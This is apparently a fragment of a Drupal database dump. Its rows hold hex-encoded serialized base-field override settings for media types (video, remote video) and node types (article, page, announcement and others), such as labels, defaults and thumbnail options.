('', 'core.base_field_override.media.remote_video.status', 0x613a31363a7b733a343a2275756964223b733a33363a2262386438643766392d343931342d346338662d393239652d626532303061313130633432223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a32333a226d656469612e747970652e72656d6f74655f766964656f223b7d7d733a323a226964223b733a32353a226d656469612e72656d6f74655f766964656f2e737461747573223b733a31303a226669656c645f6e616d65223b733a363a22737461747573223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a31323a2272656d6f74655f766964656f223b733a353a226c6162656c223b733a393a225075626c6973686564223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b693a313b7d7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b733a323a224f6e223b733a393a226f66665f6c6162656c223b733a333a224f6666223b7d733a31303a226669656c645f74797065223b733a373a22626f6f6c65616e223b7d),
('', 'core.base_field_override.media.remote_video.thumbnail', 0x613a31363a7b733a343a2275756964223b733a33363a2231383833343636342d373966662d343832662d396366312d623762323733373734353939223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a32333a226d656469612e747970652e72656d6f74655f766964656f223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a353a22696d616765223b7d7d733a323a226964223b733a32383a226d656469612e72656d6f74655f766964656f2e7468756d626e61696c223b733a31303a226669656c645f6e616d65223b733a393a227468756d626e61696c223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a31323a2272656d6f74655f766964656f223b733a353a226c6162656c223b733a393a225468756d626e61696c223b733a31313a226465736372697074696f6e223b733a33323a22546865207468756d626e61696c206f6620746865206d65646961206974656d2e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a31323a7b733a373a2268616e646c6572223b733a373a2264656661756c74223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d733a31343a2266696c655f6469726563746f7279223b733a33313a225b646174653a637573746f6d3a595d2d5b646174653a637573746f6d3a6d5d223b733a31353a2266696c655f657874656e73696f6e73223b733a31363a22706e6720676966206a7067206a706567223b733a31323a226d61785f66696c6573697a65223b733a303a22223b733a31343a226d61785f7265736f6c7574696f6e223b733a303a22223b733a31343a226d696e5f7265736f6c7574696f6e223b733a303a22223b733a393a22616c745f6669656c64223b623a313b733a31383a22616c745f6669656c645f7265717569726564223b623a313b733a31313a227469746c655f6669656c64223b623a303b733a32303a227469746c655f6669656c645f7265717569726564223b623a303b733a31333a2264656661756c745f696d616765223b613a353a7b733a343a2275756964223b4e3b733a333a22616c74223b733a303a22223b733a353a227469746c65223b733a303a22223b733a353a227769647468223b4e3b733a363a22686569676874223b4e3b7d7d733a31303a226669656c645f74797065223b733a353a22696d616765223b7d),
('', 'core.base_field_override.media.remote_video.uid', 0x613a31363a7b733a343a2275756964223b733a33363a2235363532653139642d303237622d343363312d383138372d363233366464373865633734223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a32333a226d656469612e747970652e72656d6f74655f766964656f223b7d7d733a323a226964223b733a32323a226d656469612e72656d6f74655f766964656f2e756964223b733a31303a226669656c645f6e616d65223b733a333a22756964223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a31323a2272656d6f74655f766964656f223b733a353a226c6162656c223b733a31313a22417574686f726564206279223b733a31313a226465736372697074696f6e223b733a32363a225468652075736572204944206f662074686520617574686f722e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a34383a2244727570616c5c6d656469615c456e746974795c4d656469613a3a67657444656661756c74456e746974794f776e6572223b733a383a2273657474696e6773223b613a323a7b733a373a2268616e646c6572223b733a373a2264656661756c74223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d7d733a31303a226669656c645f74797065223b733a31363a22656e746974795f7265666572656e6365223b7d),
('', 'core.base_field_override.media.video.changed', 0x613a31363a7b733a343a2275756964223b733a33363a2238666262306530662d623634332d343163312d393632342d633134303436343930613436223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226d656469612e747970652e766964656f223b7d7d733a323a226964223b733a31393a226d656469612e766964656f2e6368616e676564223b733a31303a226669656c645f6e616d65223b733a373a226368616e676564223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22766964656f223b733a353a226c6162656c223b733a373a224368616e676564223b733a31313a226465736372697074696f6e223b733a34303a225468652074696d6520746865206d65646961206974656d20776173206c617374206564697465642e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a373a226368616e676564223b7d),
('', 'core.base_field_override.media.video.created', 0x613a31363a7b733a343a2275756964223b733a33363a2233646564306364342d383264352d343364372d616236632d346533613161333964633637223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226d656469612e747970652e766964656f223b7d7d733a323a226964223b733a31393a226d656469612e766964656f2e63726561746564223b733a31303a226669656c645f6e616d65223b733a373a2263726561746564223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22766964656f223b733a353a226c6162656c223b733a31313a22417574686f726564206f6e223b733a31313a226465736372697074696f6e223b733a33363a225468652074696d6520746865206d65646961206974656d2077617320637265617465642e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a34313a2244727570616c5c6d656469615c456e746974795c4d656469613a3a6765745265717565737454696d65223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a373a2263726561746564223b7d),
('', 'core.base_field_override.media.video.name', 0x613a31363a7b733a343a2275756964223b733a33363a2264326131323463382d623237612d343738392d383561612d303234633263333139643936223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226d656469612e747970652e766964656f223b7d7d733a323a226964223b733a31363a226d656469612e766964656f2e6e616d65223b733a31303a226669656c645f6e616d65223b733a343a226e616d65223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22766964656f223b733a353a226c6162656c223b733a343a224e616d65223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a313b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b733a303a22223b7d7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a363a22737472696e67223b7d),
('', 'core.base_field_override.media.video.path', 0x613a31363a7b733a343a2275756964223b733a33363a2266333462653535382d613965612d343133362d623265302d313335653136313732373638223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226d656469612e747970652e766964656f223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2270617468223b7d7d733a323a226964223b733a31363a226d656469612e766964656f2e70617468223b733a31303a226669656c645f6e616d65223b733a343a2270617468223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22766964656f223b733a353a226c6162656c223b733a393a2255524c20616c696173223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a343a2270617468223b7d),
('', 'core.base_field_override.media.video.status', 0x613a31363a7b733a343a2275756964223b733a33363a2264313038663835662d616136632d346533612d623836332d313766646431373766653032223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226d656469612e747970652e766964656f223b7d7d733a323a226964223b733a31383a226d656469612e766964656f2e737461747573223b733a31303a226669656c645f6e616d65223b733a363a22737461747573223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22766964656f223b733a353a226c6162656c223b733a393a225075626c6973686564223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b693a313b7d7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b733a323a224f6e223b733a393a226f66665f6c6162656c223b733a333a224f6666223b7d733a31303a226669656c645f74797065223b733a373a22626f6f6c65616e223b7d),
('', 'core.base_field_override.media.video.thumbnail', 0x613a31363a7b733a343a2275756964223b733a33363a2261326230343636342d613863352d346439632d396531372d616239393465386364333033223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226d656469612e747970652e766964656f223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a353a22696d616765223b7d7d733a323a226964223b733a32313a226d656469612e766964656f2e7468756d626e61696c223b733a31303a226669656c645f6e616d65223b733a393a227468756d626e61696c223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22766964656f223b733a353a226c6162656c223b733a393a225468756d626e61696c223b733a31313a226465736372697074696f6e223b733a33323a22546865207468756d626e61696c206f6620746865206d65646961206974656d2e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a31323a7b733a373a2268616e646c6572223b733a373a2264656661756c74223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d733a31343a2266696c655f6469726563746f7279223b733a33313a225b646174653a637573746f6d3a595d2d5b646174653a637573746f6d3a6d5d223b733a31353a2266696c655f657874656e73696f6e73223b733a31363a22706e6720676966206a7067206a706567223b733a31323a226d61785f66696c6573697a65223b733a303a22223b733a31343a226d61785f7265736f6c7574696f6e223b733a303a22223b733a31343a226d696e5f7265736f6c7574696f6e223b733a303a22223b733a393a22616c745f6669656c64223b623a313b733a31383a22616c745f6669656c645f7265717569726564223b623a313b733a31313a227469746c655f6669656c64223b623a303b733a32303a227469746c655f6669656c645f7265717569726564223b623a303b733a31333a2264656661756c745f696d616765223b613a353a7b733a343a2275756964223b4e3b733a333a22616c74223b733a303a22223b733a353a227469746c65223b733a303a22223b733a353a227769647468223b4e3b733a363a22686569676874223b4e3b7d7d733a31303a226669656c645f74797065223b733a353a22696d616765223b7d),
('', 'core.base_field_override.media.video.uid', 0x613a31363a7b733a343a2275756964223b733a33363a2264313165666235662d626636332d343765622d393131382d316566616463313238356134223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31363a226d656469612e747970652e766964656f223b7d7d733a323a226964223b733a31353a226d656469612e766964656f2e756964223b733a31303a226669656c645f6e616d65223b733a333a22756964223b733a31313a22656e746974795f74797065223b733a353a226d65646961223b733a363a2262756e646c65223b733a353a22766964656f223b733a353a226c6162656c223b733a31313a22417574686f726564206279223b733a31313a226465736372697074696f6e223b733a32363a225468652075736572204944206f662074686520617574686f722e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a34383a2244727570616c5c6d656469615c456e746974795c4d656469613a3a67657444656661756c74456e746974794f776e6572223b733a383a2273657474696e6773223b613a323a7b733a373a2268616e646c6572223b733a373a2264656661756c74223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d7d733a31303a226669656c645f74797065223b733a31363a22656e746974795f7265666572656e6365223b7d),
('', 'core.base_field_override.node.activities.promote', 0x613a31363a7b733a343a2275756964223b733a33363a2232653733376463632d613564632d346230392d623064372d323538323561633764643631223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a32303a226e6f64652e747970652e61637469766974696573223b7d7d733a323a226964223b733a32333a226e6f64652e616374697669746965732e70726f6d6f7465223b733a31303a226669656c645f6e616d65223b733a373a2270726f6d6f7465223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a31303a2261637469766974696573223b733a353a226c6162656c223b733a32323a2250726f6d6f74656420746f2066726f6e742070616765223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a313b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b693a303b7d7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b733a323a224f6e223b733a393a226f66665f6c6162656c223b733a333a224f6666223b7d733a31303a226669656c645f74797065223b733a373a22626f6f6c65616e223b7d),
('', 'core.base_field_override.node.announcement.promote', 0x613a31363a7b733a343a2275756964223b733a33363a2235333537323765362d653936632d346139642d383139362d613936306130663835373762223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a32323a226e6f64652e747970652e616e6e6f756e63656d656e74223b7d7d733a323a226964223b733a32353a226e6f64652e616e6e6f756e63656d656e742e70726f6d6f7465223b733a31303a226669656c645f6e616d65223b733a373a2270726f6d6f7465223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a31323a22616e6e6f756e63656d656e74223b733a353a226c6162656c223b733a32323a2250726f6d6f74656420746f2066726f6e742070616765223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a313b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b693a303b7d7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b733a323a224f6e223b733a393a226f66665f6c6162656c223b733a333a224f6666223b7d733a31303a226669656c645f74797065223b733a373a22626f6f6c65616e223b7d),
('', 'core.base_field_override.node.article.changed', 0x613a31363a7b733a343a2275756964223b733a33363a2266306266643035332d323262622d343362312d383730342d356331646633313234613263223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31373a226e6f64652e747970652e61727469636c65223b7d7d733a323a226964223b733a32303a226e6f64652e61727469636c652e6368616e676564223b733a31303a226669656c645f6e616d65223b733a373a226368616e676564223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a373a2261727469636c65223b733a353a226c6162656c223b733a373a224368616e676564223b733a31313a226465736372697074696f6e223b733a33393a225468652074696d65207468617420746865206e6f646520776173206c617374206564697465642e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a373a226368616e676564223b7d),
('', 'core.base_field_override.node.article.created', 0x613a31363a7b733a343a2275756964223b733a33363a2231656163323335362d383733392d343833332d626339342d633232313333376461396530223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31373a226e6f64652e747970652e61727469636c65223b7d7d733a323a226964223b733a32303a226e6f64652e61727469636c652e63726561746564223b733a31303a226669656c645f6e616d65223b733a373a2263726561746564223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a373a2261727469636c65223b733a353a226c6162656c223b733a31313a22417574686f726564206f6e223b733a31313a226465736372697074696f6e223b733a33353a225468652074696d65207468617420746865206e6f64652077617320637265617465642e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a373a2263726561746564223b7d),
('', 'core.base_field_override.node.article.menu_link', 0x613a31363a7b733a343a2275756964223b733a33363a2233636230623465612d613636352d343230322d386332332d396234396634353165626363223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31373a226e6f64652e747970652e61727469636c65223b7d7d733a323a226964223b733a32323a226e6f64652e61727469636c652e6d656e755f6c696e6b223b733a31303a226669656c645f6e616d65223b733a393a226d656e755f6c696e6b223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a373a2261727469636c65223b733a353a226c6162656c223b733a393a224d656e75206c696e6b223b733a31313a226465736372697074696f6e223b733a36383a22436f6d7075746564206d656e75206c696e6b20666f7220746865206e6f646520286f6e6c7920617661696c61626c6520647572696e67206e6f646520736176696e67292e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a323a7b733a373a2268616e646c6572223b733a373a2264656661756c74223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d7d733a31303a226669656c645f74797065223b733a31363a22656e746974795f7265666572656e6365223b7d),
('', 'core.base_field_override.node.article.path', 0x613a31363a7b733a343a2275756964223b733a33363a2230393163613763342d393332662d343862632d393633662d313635666235393931623735223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a22636f6e666967223b613a313a7b693a303b733a31373a226e6f64652e747970652e61727469636c65223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a343a2270617468223b7d7d733a323a226964223b733a31373a226e6f64652e61727469636c652e70617468223b733a31303a226669656c645f6e616d65223b733a343a2270617468223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a373a2261727469636c65223b733a353a226c6162656c223b733a393a2255524c20616c696173223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a343a2270617468223b7d),
('', 'core.base_field_override.node.article.promote', 0x613a31363a7b733a343a2275756964223b733a33363a2231306339333466612d636139372d343463612d623534372d306639366464396235393137223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31373a226e6f64652e747970652e61727469636c65223b7d7d733a323a226964223b733a32303a226e6f64652e61727469636c652e70726f6d6f7465223b733a31303a226669656c645f6e616d65223b733a373a2270726f6d6f7465223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a373a2261727469636c65223b733a353a226c6162656c223b733a32323a2250726f6d6f74656420746f2066726f6e742070616765223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b693a313b7d7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b733a323a224f6e223b733a393a226f66665f6c6162656c223b733a333a224f6666223b7d733a31303a226669656c645f74797065223b733a373a22626f6f6c65616e223b7d),
('', 'core.base_field_override.node.article.status', 0x613a31363a7b733a343a2275756964223b733a33363a2232643136613832662d326534352d346263652d623866652d613165313363656638376361223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31373a226e6f64652e747970652e61727469636c65223b7d7d733a323a226964223b733a31393a226e6f64652e61727469636c652e737461747573223b733a31303a226669656c645f6e616d65223b733a363a22737461747573223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a373a2261727469636c65223b733a353a226c6162656c223b733a393a225075626c6973686564223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b693a313b7d7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b733a323a224f6e223b733a393a226f66665f6c6162656c223b733a333a224f6666223b7d733a31303a226669656c645f74797065223b733a373a22626f6f6c65616e223b7d),
('', 'core.base_field_override.node.article.sticky', 0x613a31363a7b733a343a2275756964223b733a33363a2235663133363237642d326161652d343836312d626663632d323236393834636134303538223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31373a226e6f64652e747970652e61727469636c65223b7d7d733a323a226964223b733a31393a226e6f64652e61727469636c652e737469636b79223b733a31303a226669656c645f6e616d65223b733a363a22737469636b79223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a373a2261727469636c65223b733a353a226c6162656c223b733a32323a22537469636b7920617420746f70206f66206c69737473223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b693a303b7d7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b733a323a224f6e223b733a393a226f66665f6c6162656c223b733a333a224f6666223b7d733a31303a226669656c645f74797065223b733a373a22626f6f6c65616e223b7d),
('', 'core.base_field_override.node.article.title', 0x613a31363a7b733a343a2275756964223b733a33363a2262386339333366382d326533332d343232312d623631612d376661646132363833353466223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31373a226e6f64652e747970652e61727469636c65223b7d7d733a323a226964223b733a31383a226e6f64652e61727469636c652e7469746c65223b733a31303a226669656c645f6e616d65223b733a353a227469746c65223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a373a2261727469636c65223b733a353a226c6162656c223b733a353a225469746c65223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a313b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a303a7b7d733a31303a226669656c645f74797065223b733a363a22737472696e67223b7d),
('', 'core.base_field_override.node.article.uid', 0x613a31363a7b733a343a2275756964223b733a33363a2235663662306137342d656165342d343366352d613865612d613063363038646665346430223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31373a226e6f64652e747970652e61727469636c65223b7d7d733a323a226964223b733a31363a226e6f64652e61727469636c652e756964223b733a31303a226669656c645f6e616d65223b733a333a22756964223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a373a2261727469636c65223b733a353a226c6162656c223b733a31313a22417574686f726564206279223b733a31313a226465736372697074696f6e223b733a33353a2254686520757365726e616d65206f662074686520636f6e74656e7420617574686f722e223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a303b733a31333a2264656661756c745f76616c7565223b613a303a7b7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a34363a2244727570616c5c6e6f64655c456e746974795c4e6f64653a3a67657444656661756c74456e746974794f776e6572223b733a383a2273657474696e6773223b613a323a7b733a373a2268616e646c6572223b733a373a2264656661756c74223b733a31363a2268616e646c65725f73657474696e6773223b613a303a7b7d7d733a31303a226669656c645f74797065223b733a31363a22656e746974795f7265666572656e6365223b7d),
('', 'core.base_field_override.node.language_center.promote', 0x613a31363a7b733a343a2275756964223b733a33363a2237643032643338342d393362322d343261352d396264642d333261626263353865623061223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a32353a226e6f64652e747970652e6c616e67756167655f63656e746572223b7d7d733a323a226964223b733a32383a226e6f64652e6c616e67756167655f63656e7465722e70726f6d6f7465223b733a31303a226669656c645f6e616d65223b733a373a2270726f6d6f7465223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a31353a226c616e67756167655f63656e746572223b733a353a226c6162656c223b733a32323a2250726f6d6f74656420746f2066726f6e742070616765223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a313b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b693a303b7d7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b733a323a224f6e223b733a393a226f66665f6c6162656c223b733a333a224f6666223b7d733a31303a226669656c645f74797065223b733a373a22626f6f6c65616e223b7d),
('', 'core.base_field_override.node.page.promote', 0x613a31373a7b733a343a2275756964223b733a33363a2261376231383935642d346231372d343434302d386436662d333565336535376139363862223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a363a22636f6e666967223b613a313a7b693a303b733a31343a226e6f64652e747970652e70616765223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22665055456e6d3454357a665a527233747444557171377943446432755733636c57442d70766f7334746c51223b7d733a323a226964223b733a31373a226e6f64652e706167652e70726f6d6f7465223b733a31303a226669656c645f6e616d65223b733a373a2270726f6d6f7465223b733a31313a22656e746974795f74797065223b733a343a226e6f6465223b733a363a2262756e646c65223b733a343a2270616765223b733a353a226c6162656c223b733a32323a2250726f6d6f74656420746f2066726f6e742070616765223b733a31313a226465736372697074696f6e223b733a303a22223b733a383a227265717569726564223b623a303b733a31323a227472616e736c617461626c65223b623a313b733a31333a2264656661756c745f76616c7565223b613a313a7b693a303b613a313a7b733a353a2276616c7565223b693a303b7d7d733a32323a2264656661756c745f76616c75655f63616c6c6261636b223b733a303a22223b733a383a2273657474696e6773223b613a323a7b733a383a226f6e5f6c6162656c223b733a323a224f6e223b733a393a226f66665f6c6162656c223b733a333a224f6666223b7d733a31303a226669656c645f74797065223b733a373a22626f6f6c65616e223b7d),
